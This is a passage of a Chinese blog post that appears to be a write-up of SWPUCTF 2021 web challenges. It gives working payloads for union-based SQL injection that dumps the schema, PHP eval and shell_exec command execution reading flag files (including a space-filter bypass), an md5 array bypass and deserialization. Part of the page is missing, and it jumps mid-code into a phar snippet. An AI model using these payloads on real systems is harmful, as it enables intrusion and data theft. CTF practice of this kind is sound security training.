您当前的位置: 首页 > 

ThnPkm

暂无认证

  • 3浏览

    0关注

    98博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

[SWPUCTF 2021 新生赛] web

ThnPkm 发布时间:2022-08-07 01:47:32 ,浏览量:3

目录

gift_F12

caidao 

 jicao

 easy_md5 

easy_sql  

easyrce

babyrce

ez_unserialize

include

 no_wakeup 

Do_you_know_http

easyupload1.0 

 easyupload2.0 

easyupload3.0

  error 

hardrce 无数字字母rce

hardrce_3 无数字字母rce

finalrce 无回显rce  

PseudoProtocols 伪协议 

pop 

sql 

Baby_Web   变量覆盖

babyunser  phar反序列化

SimplePHP  phar反序列化

文件查看器 phar反序列化

gift_F12

源码目录找flag

caidao 

简单的rce

 

 jicao

json字符串例子 

json['x']=wllm  的json格式是 {"x":"wllm"}

 

 easy_md5  
if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }

数组绕过 

name[]=1

password[]=2

easy_sql   

/?wllm=-1' union select 1,2,3--+ 

/?wllm=-1' union select 1,2,database()--+

/?wllm=-1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database())--+

/?wllm=-1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='test_tb')--+

/?wllm=-1' union select 1,2,(select group_concat(flag)from test_tb)--+
easyrce 
if(isset($_GET['url']))
{
eval($_GET['url']);
/?url=system('cat /fl*');
babyrce

 

 

if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/ /", $ip)){
      die('nonono');
  }
  $a = shell_exec($ip);
  echo $a;

就是过滤空格,rce时候不能ls / 

${IFS} 代替空格

/rasalghul.php?url=cat${IFS}/fl*

 

ez_unserialize 
class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

简单构造 

还有个Class.php

');
$phar->setMetadata($a);//链子以$a为起点
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
?>

根据上传功能的源码phar文件要改名,然后访问upload目录

 以phar协议读取

文件查看器 phar反序列化

这题有点难啊

WP篇之解析GFCTF---文件查看器 | Arsene.Tang

admin , admin 登录进去 

www.zip源码泄露

Files.class.php
关注
打赏
1660722558
查看更多评论

最近更新

热门博客

[ 申请 ]友情链接:

ClashX教程 绘画宝宝 配音宝宝
0.0360s